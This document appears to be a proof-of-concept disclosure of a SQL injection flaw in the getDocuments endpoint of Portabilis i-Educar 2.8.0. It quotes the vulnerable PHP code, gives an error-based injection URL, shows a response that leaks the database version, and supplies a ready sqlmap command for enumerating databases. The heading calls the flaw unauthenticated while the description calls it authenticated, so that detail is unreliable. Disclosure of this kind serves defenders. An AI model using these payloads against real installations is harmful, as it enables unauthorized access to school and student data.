
Proof-of-concept for SQL injection in Portabilis i-Educar 2.8.0, demonstrating unauthenticated database access via the getDocuments endpoint with automated exploitation using SQLMap.
Description: An authenticated user can abuse SQL injection vulnerability exists in the
getDocumentsfunction of theInstituicaoDocumentacaoControllerclass. Theinstituicao_idparameter in/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_idis not properly sanitized, allowing an authenticated remote attacker to inject malicious SQL commands.
Versions: Discovered in Portabilis i-Educar 2.8.0.
The issue is present in the getDocuments function of the InstituicaoDocumentacaoController class, which can be triggered through the following endpoint:
class InstituicaoDocumentacaoController extends ApiCoreController
{
protected function insertDocuments()
{
$var1 = $this->getRequest()->instituicao_id;
$var2 = $this->getRequest()->titulo_documento;
$var3 = $this->getRequest()->url_documento;
$var4 = $this->getRequest()->ref_usuario_cad;
$var5 = $this->getRequest()->ref_cod_escola;
$sql = "INSERT INTO pmieducar.instituicao_documentacao (instituicao_id, titulo_documento, url_documento, ref_usuario_cad, ref_cod_escola) VALUES ($var1, '$var2', '$var3', $var4, $var5)";
$this->fetchPreparedQuery($sql);
$sql = "SELECT MAX(id) FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1";
$novoId = $this->fetchPreparedQuery($sql);
return ['id' => $novoId[0][0]];
}
protected function getDocuments()
{
$var1 = $this->getRequest()->instituicao_id;
$sql = "SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1 ORDER BY id DESC";
$instituicao = $this->fetchPreparedQuery($sql);
$attrs = ['id', 'titulo_documento', 'url_documento', 'ref_usuario_cad', 'ref_cod_escola'];
$instituicao = Portabilis_Array_Utils::filterSet($instituicao, $attrs);
return ['documentos' => $instituicao];
}
}
The instituicao_id parameter is used directly in SQL queries without proper sanitization or parameterization. This allows attackers to send malicious HTTP requests to inject SQL commands, potentially gaining unauthorized access to the database or manipulating data.
/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14+AND+(CAST(VERSION()+AS+INTEGER))%3d1{
"oper": "get",
"resource": "getDocuments",
"msgs": [
{
"msg": "Exception: Error preparing query (SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC) in the database: Exception: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for type integer: \"PostgreSQL 16.4 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20240309) 13.2.1 20240309, 64-bit\" (Connection: pgsql, SQL: SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC)",
"type": "error"
}
],
"any_error_msg": true
}
sqlmap -r ../instituicaoDocumentacao.r --dbms postgres --dbs -p instituicao_id --risk 3 --level 5